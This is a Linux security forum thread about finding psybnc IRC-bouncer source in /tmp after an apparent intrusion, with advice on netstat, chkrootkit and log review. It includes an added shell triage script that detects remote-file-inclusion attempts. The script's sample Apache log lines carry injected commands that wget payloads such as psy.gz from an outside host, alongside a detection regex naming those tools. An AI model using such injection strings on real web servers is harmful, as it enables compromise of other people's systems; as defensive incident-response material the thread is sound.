Linux - Security (LinuxQuestions.org forum)
This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
This could mean serious trouble. bnc must be installed in other places also (my guess).
Check your netstat for any new ports that are open. Check ps for suspicious processes. Use chkrootkit to see if it detects anything. You would want to see your logs as to where the intruder came in from.
This could probably be something like a remote file inclusion in phpBB or something, so check your Apache logs.
Search for world-writable directories too and see if there is anything installed in them.
If you are using ssh then temp folders may be normal; I don't get them with OpenSSH though. Either way they won't be needed after a reboot, so removing the lot and rebooting should work fine (in theory you can dump the whole of /tmp, but I've found X was a bit picky about that). If you think you might have a security problem then you need to get busy with netstat as w3bd3vil describes.
If you have psybnc source code in /tmp and you didn't put it there, then that is a very bad sign. First, who owned the file(s)? I would also recommend that you don't delete any more files or directories until you have a better idea of what is going on. Do follow w3bd3vil's advice and look carefully through your Apache logs, especially for URLs that have shell commands like wget, cd, etc., or contain psy.gz. Don't ignore the issue and delude yourself into thinking everything is OK until you can be definitely sure of that.
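The log search and host checks that the two replies above describe, written out as an added example. This is not code from any post in this thread: the Apache access-log lines are constructed for the example (the phpBB-style request, the hosts and the addresses are assumptions), and the live checks at the end only run when the script is invoked with --live on the box being triaged.

```sh
#!/bin/sh
# Added triage helper, not from the thread. Scans an Apache access log for
# the remote-file-inclusion (RFI) indicators the replies above mention:
# shell commands (wget, cd) in a request, the psy.gz archive, and a full
# http:// URL passed as a parameter value. The sample log lines are
# constructed; paths, hosts and IP addresses are assumptions.

# Indicator regex, matched case-insensitively. %20 and + are the two usual
# encodings of a space inside a query string.
RFI_PATTERN='wget(%20|\+| )|cd(%20|\+| )|psy\.gz|[?&][a-z_]+=https?://|system\(|passthru\(|shell_exec\('

# Print every request line that matches an indicator.
scan_rfi_log() {
    grep -Ei "$RFI_PATTERN" "$1"
}

# Number of matching request lines (prints 0 when clean; safe under set -e
# because the pipeline's status is that of tr, not grep).
count_rfi_hits() {
    grep -Ei "$RFI_PATTERN" "$1" | wc -l | tr -d ' '
}

# Distinct client addresses behind the matches: where the intruder came from.
rfi_sources() {
    grep -Ei "$RFI_PATTERN" "$1" | awk '{print $1}' | sort -u
}

# Write the constructed sample log (combined log format) to the path in $1.
write_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [12/Mar/2006:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2006:10:05:13 +0000] "GET /phpBB2/viewtopic.php?t=12&highlight=%2527%252Esystem(wget%2520http://203.0.113.9/psy.gz)%252E%2527 HTTP/1.1" 200 12 "-" "Mozilla/4.0"
10.0.0.5 - - [12/Mar/2006:10:06:40 +0000] "GET /images/logo.png HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2006:10:07:02 +0000] "GET /forum/index.php?page=http://203.0.113.9/cmd.txt? HTTP/1.0" 200 2 "-" "libwww-perl/5.79"
203.0.113.41 - - [12/Mar/2006:10:09:55 +0000] "GET /index.php?cmd=cd%20/tmp;wget%20http://203.0.113.9/psy.gz;tar%20xzf%20psy.gz HTTP/1.0" 200 2 "-" "-"
EOF
}

# Live host checks from the replies above. Run only on the box you are
# triaging; process names in ss/netstat and a full find need root.
live_checks() {
    echo "== listening sockets and the processes behind them =="
    if command -v ss >/dev/null 2>&1; then ss -tulpn; else netstat -tulpn; fi
    echo "== world-writable directories that are not sticky (/tmp-style) =="
    find / -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
    echo "== contents of the usual drop locations, with owners =="
    ls -la /tmp /var/tmp /dev/shm 2>/dev/null
}

# Offline demonstration on the constructed log.
LOGFILE=$(mktemp)
write_sample_log "$LOGFILE"
echo "RFI hits: $(count_rfi_hits "$LOGFILE")"
scan_rfi_log "$LOGFILE"
echo "Sources:"
rfi_sources "$LOGFILE"
rm -f "$LOGFILE"

if [ "${1:-}" = "--live" ]; then
    live_checks
fi
```

On the sample log the scan flags three of the five requests and two source addresses; the benign index and image fetches are not matched. Run it against the real log with `scan_rfi_log /var/log/apache2/access.log` (or wherever the distribution keeps it), and treat a first hit from a given address as the starting point for reading everything that address did afterwards. The pattern is deliberately narrow; a double-encoded request like the second sample line is caught here only because of the psy.gz filename and the system( call, so decode suspicious query strings by hand rather than trusting the regex alone.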
Check that; the PID is the PID of the process that invoked the agent. On my machine I currently have one such directory and the file is actually a system file of some sort, not a symbolic link (I think).
psybnc (sort of a proxy for IRC clients, or "bouncer" as they call them) is usually the first thing added by script kiddies after a system break-in. If you didn't put it there, you're definitely hacked. Worse, many times psybnc (and other tools from these types) is infected with the Linux virus RST (judging from the samples I've collected over the years).